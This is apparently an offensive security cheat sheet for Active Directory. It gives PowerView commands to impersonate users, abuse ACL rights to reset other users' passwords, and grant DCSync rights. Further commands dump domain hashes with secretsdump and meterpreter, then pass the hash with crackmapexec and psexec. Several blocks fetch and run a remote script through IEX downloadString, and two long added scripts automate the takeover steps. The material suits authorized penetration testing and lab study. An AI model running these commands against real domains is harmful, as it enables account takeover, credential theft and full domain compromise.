# Domain Enumeration + Exploitation

## PowerSploit

### Impersonate Another Domain User

```powershell
# build a PSCredential for the user we want to act as
$cred = New-Object System.Management.Automation.PSCredential "BURMAT\John.Smith", $(ConvertTo-SecureString "Spring2020!" -AsPlainText -Force);

# -Credential is enough for PowerView enumeration on its own; no token is needed yet
Find-DomainShare -ComputerName fs01.burmat.local -Credential $cred -ComputerDomain burmat.local -CheckShareAccess

# impersonate John.Smith on the current thread (a "runas /netonly"-style logon);
# PowerView warns that this does not work from a runspace such as an implant's powershell command
Invoke-UserImpersonation -Credential $cred

# now we can read the directory impersonating another user if permissions exist:
dir \\fs01.burmat.local\Private

# drop the token again with Invoke-RevertToSelf when finished
```

### Enumerate GPOs

```powershell
# look a GPO up by its GUID, e.g. one taken from an OU's gPLink attribute
"{7EA15487-7F5B-4CE3-C029-CEBE6FFE6D47}" | Get-DomainGPO
```

### Reset Domain User Password

If you hold a right over another AD user object that allows a password reset (`ForceChangePassword`/`AllExtendedRights` or `GenericAll`), or a right that lets you grant yourself one (`WriteDACL`, `WriteOwner`, or being the object's `Owner`), you can reset the password with ease:

{% code overflow="wrap" %}

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
# credentials of the account that holds the reset right over the target
$user = 'DOMAIN\owner_acct';
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
# new password for the target; the real user is locked out from here on
$newpass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force;
Set-DomainUserPassword -Identity 'DOMAIN\vuln_user' -AccountPassword $newpass -Credential $creds;
```

{% endcode %}

If you only have `WriteOwner`, you can also make yourself the owner first; an object's owner implicitly holds `WriteDACL`, so you can then write the ACE you need and reset the password:

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.10.123/ps/PowerView.ps1')
# take ownership of the target object (needs WriteOwner)
Set-DomainObjectOwner -Identity it_admin -OwnerIdentity burmat
# add an ACE for ourselves; without -Rights PowerView grants 'All' (GenericAll),
# -Rights ResetPassword would be the smaller change
Add-DomainObjectAcl -TargetIdentity it_admin -PrincipalIdentity burmat
$newpass = ConvertTo-SecureString -String 'burmat123$' -AsPlainText -Force
Set-DomainUserPassword -Identity it_admin -AccountPassword $newpass
```

Or you can change the password from a Linux host with Impacket's `smbpasswd.py`.
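Before abusing any of these rights it is worth confirming which ones you actually hold over the target, because the route differs: `GenericAll` or `ForceChangePassword` reset directly, `WriteDACL` needs an extra ACE first, and `WriteOwner` needs an ownership change before the ACE. The PowerShell below is an added example, not code from the original page or from PowerView itself; it assumes PowerView is already loaded in the session and uses the placeholder names `burmat` (the account you control) and `it_admin` (the target), and it cleans up the ACE it added afterwards.

```powershell
# Added example: audit our rights over a target user, take the shortest route to a password
# reset, and restore the DACL afterwards. Assumes PowerView is loaded; names are placeholders.
$Me     = 'burmat'     # assumption: the account we already control
$Target = 'it_admin'   # assumption: the user we want to take over

# ACEs may be granted to us directly, to a group we are in, or to Everyone/Authenticated Users
$MySids = @((Get-DomainUser -Identity $Me).objectsid) +
          @(Get-DomainGroup -MemberIdentity $Me | ForEach-Object { $_.objectsid }) +
          @('S-1-1-0', 'S-1-5-11')

# -ResolveGUIDs turns extended-right GUIDs into names such as User-Force-Change-Password
$Aces = @(Get-DomainObjectAcl -Identity $Target -ResolveGUIDs | Where-Object {
    $_.AceType -match 'AccessAllowed' -and $MySids -contains $_.SecurityIdentifier.Value
})
$Aces | Select-Object ActiveDirectoryRights, ObjectAceType | Format-Table -AutoSize

# Rights that allow the reset right now: GenericAll, the reset extended right itself, or an
# ExtendedRight ACE with no object type (= all extended rights)
$CanResetNow = [bool]($Aces | Where-Object {
    ($_.ActiveDirectoryRights -match 'GenericAll') -or
    ($_.ObjectAceType -eq 'User-Force-Change-Password') -or
    (($_.ActiveDirectoryRights -match 'ExtendedRight') -and -not $_.ObjectAceType)
})
$HasWriteDacl  = [bool]($Aces | Where-Object { $_.ActiveDirectoryRights -match 'WriteDacl' })
$HasWriteOwner = [bool]($Aces | Where-Object { $_.ActiveDirectoryRights -match 'WriteOwner' })

$AddedAce = $false
if ($CanResetNow) {
    Write-Host "[*] $Me can already reset the password of $Target"
} elseif ($HasWriteDacl) {
    # Grant only the reset right instead of PowerView's default 'All' to keep the change small
    Add-DomainObjectAcl -TargetIdentity $Target -PrincipalIdentity $Me -Rights ResetPassword
    $AddedAce = $true
} elseif ($HasWriteOwner) {
    # An object's owner implicitly holds WRITE_DAC, so take ownership first, then add the ACE
    Set-DomainObjectOwner -Identity $Target -OwnerIdentity $Me
    Add-DomainObjectAcl -TargetIdentity $Target -PrincipalIdentity $Me -Rights ResetPassword
    $AddedAce = $true
} else {
    throw "$Me holds no usable right over $Target"
}

# Destructive and noisy: the real user is locked out and the DC logs event 4724 (password reset)
$NewPass = ConvertTo-SecureString 'burmatw@sh3r3' -AsPlainText -Force
Set-DomainUserPassword -Identity $Target -AccountPassword $NewPass

# Put the DACL back the way we found it (a changed owner is not reverted here)
if ($AddedAce) {
    Remove-DomainObjectAcl -TargetIdentity $Target -PrincipalIdentity $Me -Rights ResetPassword
}
```

The check includes group SIDs and the well-known Everyone/Authenticated Users SIDs because an ACE is rarely written for a single user; missing those is the usual reason a "no rights" result is wrong.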

### Add/Exploit DCSync Rights

If you have `WriteDACL` rights on the domain object itself (`DC=...`), you can give DCSync rights (the `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All` extended rights) to an unprivileged domain user account:

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15/PowerView.ps1')
# credentials of the account holding WriteDACL on the domain object
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('HTB\harutomo', $pass)
# -Rights DCSync writes the replication extended-right ACEs for the principal onto the domain head
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity harutomo -Rights DCSync
```

{% code overflow="wrap" %}

```powershell
# same grant, issued from a session that already runs as the WriteDACL holder
Add-DomainObjectAcl -TargetIdentity "DC=burmat,DC=local" -PrincipalIdentity jsmith -Rights DCSync
```

{% endcode %}
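A DCSync ACE on the domain head is a well-known persistence finding and the replication itself shows up on the DC as event 4662 with the replication GUIDs, so check who already holds the rights before adding your own, verify the grant actually landed (through the user directly or through a group), and remove it when you are done. The PowerShell below is an added example, not from the original page or from PowerView; it assumes PowerView is loaded and uses `DC=burmat,DC=local` and `jsmith` as placeholders.

```powershell
# Added example: list principals holding replication rights on the domain head, verify one
# principal (directly or via group) can DCSync, then remove the grant. PowerView assumed loaded.
$DomainDN  = 'DC=burmat,DC=local'   # assumption: the domain object
$Principal = 'jsmith'               # assumption: the user we granted DCSync to

# DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain
# object; GenericAll covers both. -ResolveGUIDs gives the extended rights by name.
function Get-ReplicationAce ($DN) {
    Get-DomainObjectAcl -Identity $DN -ResolveGUIDs | Where-Object {
        $_.AceType -match 'AccessAllowed' -and (
            $_.ObjectAceType -like 'DS-Replication-Get-Changes*' -or
            $_.ActiveDirectoryRights -match 'GenericAll')
    }
}

# Name of the right an ACE conveys, for display and for the DCSync check
function Get-AceRightName ($Ace) {
    if ($Ace.ObjectAceType) { $Ace.ObjectAceType } else { 'GenericAll' }
}

function Test-DCSyncRight ($DN, $User) {
    # ACEs may sit on a group the user belongs to, so collect the user's SID plus its groups
    $sids = @((Get-DomainUser -Identity $User).objectsid) +
            @(Get-DomainGroup -MemberIdentity $User | ForEach-Object { $_.objectsid })
    $held = @(Get-ReplicationAce $DN | Where-Object { $sids -contains $_.SecurityIdentifier.Value } |
             ForEach-Object { Get-AceRightName $_ } | Sort-Object -Unique)
    [PSCustomObject]@{
        User      = $User
        Rights    = ($held -join ', ')
        CanDCSync = ($held -contains 'GenericAll') -or
                    (($held -contains 'DS-Replication-Get-Changes') -and
                     ($held -contains 'DS-Replication-Get-Changes-All'))
    }
}

# Baseline: normally only Domain Controllers, Enterprise Domain Controllers, Administrators
# and similar built-ins should appear here; anything else is worth a closer look
Write-Host "[*] Replication rights on $DomainDN"
Get-ReplicationAce $DomainDN | Group-Object { $_.SecurityIdentifier.Value } | ForEach-Object {
    [PSCustomObject]@{
        Principal = ConvertFrom-SID $_.Name
        Rights    = (($_.Group | ForEach-Object { Get-AceRightName $_ } | Sort-Object -Unique) -join ', ')
    }
} | Format-Table -AutoSize

# Check the grant rather than assuming Add-DomainObjectAcl succeeded silently
$Check = Test-DCSyncRight $DomainDN $Principal
if (-not $Check.CanDCSync) { throw "$Principal cannot DCSync yet (holds: $($Check.Rights))" }
Write-Host "[+] $Principal can DCSync (holds: $($Check.Rights))"

# Cleanup when finished: a stray DCSync ACE on the domain head is a textbook persistence finding
Remove-DomainObjectAcl -TargetIdentity $DomainDN -PrincipalIdentity $Principal -Rights DCSync
```

Run the baseline listing once before the grant and once after the cleanup; the two outputs should match, which is the quickest way to confirm nothing was left behind.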

And you can use these rights to dump the hashes from the domain:

#### from a meterpreter (with the kiwi extension loaded)

```
meterpreter > dcsync_ntlm burmat.local\\jsmith
```

#### using impacket secretsdump.py

```bash
# From attacker machine; secretsdump uses the DRSUAPI replication path with these rights,
# add -just-dc-ntlm to fetch only the NTLM hashes from the DC
./secretsdump.py htb.local/harutomo:Password123@10.10.10.161
```

You do not need to crack the collected NTLM hashes: they can be used as-is with pass-the-hash, for example with crackmapexec

```bash
# -H takes the NT hash (or LM:NT) and authenticates with it directly
crackmapexec smb 10.10.10.161 -u administrator -H <hash>
```

<figure><img src="https://399930968-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXRskZqnMB3ERzndndCxz%2Fuploads%2F8qtc8eKQMv5gJYLcAWEx%2Fimage.png?alt=media&#x26;token=43bef386-9c22-422d-aa8c-e232735ae1d1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://399930968-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXRskZqnMB3ERzndndCxz%2Fuploads%2FVT9kWxQue7Lm5nkDKOJ1%2Fimage.png?alt=media&#x26;token=0ee67af0-b182-43b9-bed0-5da747c32641" alt=""><figcaption></figcaption></figure>

Then you can execute commands on the target with impacket-psexec, again passing the hash (`-hashes LMHASH:NTHASH`) instead of a password

<figure><img src="https://399930968-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXRskZqnMB3ERzndndCxz%2Fuploads%2FEdSPvPJwJpEE5kBxtROX%2Fimage.png?alt=media&#x26;token=a83d8329-29b7-4e54-93fc-80864f26b053" alt=""><figcaption></figcaption></figure>
